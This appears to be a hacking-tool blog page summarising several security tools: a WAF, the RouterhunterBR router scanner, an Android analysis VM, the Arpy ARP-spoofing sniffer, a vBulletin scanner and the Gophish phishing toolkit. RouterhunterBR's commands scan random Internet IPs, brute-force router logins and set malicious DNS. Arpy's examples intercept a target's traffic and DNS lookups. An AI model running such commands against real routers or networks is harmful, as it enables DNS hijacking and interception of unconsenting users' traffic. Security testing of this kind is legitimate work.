I Dont Sell ( CC, CVV, Bank Logins,WU Transfers, Paypal Ebay And Others Accounts, I am Pentester and Hacker Not Carder, Some N00bs use my name For Scam And Rip


Raptor is an Open Source Tool, yout focus is study of attacks and find intelligent ways to block attacks.

Raptor is made in pure C, don’t use regex or other common ways to block attacks, yes is diferent and fast like a raptor dinosaur, Raptor follow principle KISS (Keep It Simple), you can use Raptor to simulate attacks and bypasses at wafs.

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use blacklist of IPs to block some users at config/blacklist ip.txt
  • You can use IPv6 and IPv4 at communications
  • At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
  • At the future SSL/TLS...


to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Up some HTTPd server at port 80 
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
you can test at http://localhost:8883/test.php

Look the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf 

Tests:

509 of attacks, detect and block 349, 68% of attacks blocked


DOWNLOAD LINK
Read More

The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware has the ability to change the DNS settings of our machine redirecting the user to sites with malicious purposesImagine for example that your system is infected with this malwarewhat might happen is that the user to access a particular site (eg.Facebook.commay be forwarded to an unsolicited website and potentially illegal.

The script explores four vulnerabilities in routers

Requeriments

import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime

Usage

  -range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip

Commands

Random ips 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Scanner in range ip: 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.* 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns - DSLink 260E.
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10

Read More

AndroL4b is an android security virtual machine based on ubuntu Mate includes the collection of latest framework, tutorials and labs from different security geeks and researcher for reverse engineering and malware analysis.

Tools

Read More

Arpy - Mac OSX Arp Spoof (MITM) Tool


Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions: 
  • Packet Sniffing
  • Visited Domains
  • Visited Domains with Gource

Each function will be explained below. 

Tested OS (to date) 
  • Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)

Requirements 
  • Python 2.7
  • Gource
  • Scapy

Installation 

Gource 
brew install gource

Scapy 
pip install scapy

Sample Commands 
ivanvza:~/ > sudo arpy
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan

Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>

ARP MiTM Tool

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        The Target IP
  -g GATEWAY, --gateway=GATEWAY
                        The Gateway
  -i INTERFACE, --interface=INTERFACE
                        Interface to use
  --tcp                 Filters out only tcp traffic
  --udp                 Filters out only udp traffic
  -d D_PORT, --destination_port=D_PORT
                        Filter for a destination port
  -s S_PORT, --source_port=S_PORT
                        Filter for a source port
  --sniff               Sniff all passing data
  --sniff-dns           Sniff only searched domains
  --sniff-dns-gource    Output target's DNS searches in gource format
  -v                    Verbose scapy packet print

Packet Sniff 
This is the packet sniffer, it allows you to see your target's traffic. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan


  [Info] Starting Sniffer...

[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))

[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*



[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS

<html>
     <title>><></title>
    <body>
        <pre style="line-height: 1.25; white-space: pre;">
        \          SORRY            /
         \                         /
          \    This page does     /
           ]   not exist yet.    [    ,'|
           ]                     [   /  |
           ]___               ___[ ,'   |
           ]  ]\             /[  [ |:   |
           ]  ] \           / [  [ |:   |
           ]  ]  ]         [  [  [ |:   |
           ]  ]  ]__     __[  [  [ |:   |
           ]  ]  ] ]\ _ /[ [  [  [ |:   |
           ]  ]  ] ] (#) [ [  [  [ :===='
           ]  ]  ]_].nHn.[_[  [  [
           ]  ]  ]  HHHHH. [  [  [
           ]  ] /   `HH("N  \ [  [
           ]__]/     HHH  "  \[__[
           ]         NNN         [
           ]         N/"         [
           ]         N H         [
          /          N            \
         /           q,            \
        /                           \
        </pre>
        <h3 id="list"><h3>
    </body>
<script>

// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||

DNS Sniff 
This function allows you to see domain names that your target is currently requesting. 
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
         - @viljoenivan


  [Info] Starting DNS Sniffer...

[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

DNS Sniff With Gource 
This function is more or less the same as the above, however it provides the functionality to pass it through Gource to get a live feed of what your target is viewing. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:

tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -

[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)

Sample Gource footage 


Read More

VBScan is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them.

Why VBScan ?

If you want to do a penetration test on a vBulletin Forum, VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

usage :

./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

VBScan 0.1.4 [Dennis Ritchie]

  • Changed vulnerability scanner engine
  • Changed default specified timeout to 180 seconds
  • Added VBulletin 5.x RCE Exploit
  • Added txt report output
  • Fixed YUI 2.9.0 XSS false positive
  • Fixed reported bugs
Read More

Gophish - Open-Source Phishing Toolkit


Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.

One-Click Installation

Download and Extract the ZIP - Gophish binaries are provided for most platforms
Run the Binary Gophish is a standalone, portable binary with static assets.
That's It. - Gophish is now available on http://localhost:3333. Login with admin:gophish

Point-and-Click Phishing

Beautiful Web UI A full web UI makes creating simulated phishing campaigns easy.
Pixel-Perfect Phishing Create pixel-perfect emails and landing pages from scratch or by importing them directly into gophish.

Automate Phishing Campaigns

RESTful API - Gophish is built from the ground-up with a fully-featured JSON API.
Automated Training Use your favorite language or API utility to manage every aspect of your phishing training automatically.

Read More